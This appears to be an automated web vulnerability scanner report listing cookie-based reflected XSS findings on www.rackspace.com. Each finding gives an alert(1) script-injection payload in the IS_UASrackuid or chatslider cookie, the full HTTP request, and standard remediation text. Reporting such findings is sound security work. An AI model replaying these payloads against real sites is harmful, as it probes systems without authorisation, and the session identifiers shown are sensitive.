exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab44"><script>alert(1)</script>0b341920e1c was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d1ab44"><script>alert(1)</script>0b341920e1c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ce"><script>alert(1)</script>e9c12265e48 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ac79ce"><script>alert(1)</script>e9c12265e48; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1016e"%3balert(1)//e5e5d063a82 was submitted in the chatslider cookie. This input was echoed as 1016e";alert(1)//e5e5d063a82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A1016e"%3balert(1)//e5e5d063a82; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a731"><script>alert(1)</script>4dc46251c86 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /openstack/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86a731"><script>alert(1)</script>4dc46251c86; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53159"%3balert(1)//0e89712aaff was submitted in the IS_UASrackuid cookie. This input was echoed as 53159";alert(1)//0e89712aaff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /openstack/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f853159"%3balert(1)//0e89712aaff; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:46:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 47089
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa1"><script>alert(1)</script>9f170bbe10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /openstack/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1dfa1"><script>alert(1)</script>9f170bbe10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f770"%3balert(1)//63b04d4a517 was submitted in the chatslider cookie. This input was echoed as 4f770";alert(1)//63b04d4a517 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /openstack/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f770"%3balert(1)//63b04d4a517; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db951"><script>alert(1)</script>052686cbf was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8db951"><script>alert(1)</script>052686cbf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6970c"%3balert(1)//95c551d7ddc was submitted in the IS_UASrackuid cookie. This input was echoed as 6970c";alert(1)//95c551d7ddc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86970c"%3balert(1)//95c551d7ddc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ffad"><script>alert(1)</script>49970b9e8aa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D6ffad"><script>alert(1)</script>49970b9e8aa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1ab"%3balert(1)//15908c5f963 was submitted in the chatslider cookie. This input was echoed as ad1ab";alert(1)//15908c5f963 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dad1ab"%3balert(1)//15908c5f963; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5223d"%3balert(1)//bf0f8dce14f was submitted in the IS_UASrackuid cookie. This input was echoed as 5223d";alert(1)//bf0f8dce14f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/partnersearch.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85223d"%3balert(1)//bf0f8dce14f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ce"><script>alert(1)</script>34d29e7b245 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/partnersearch.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8590ce"><script>alert(1)</script>34d29e7b245; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
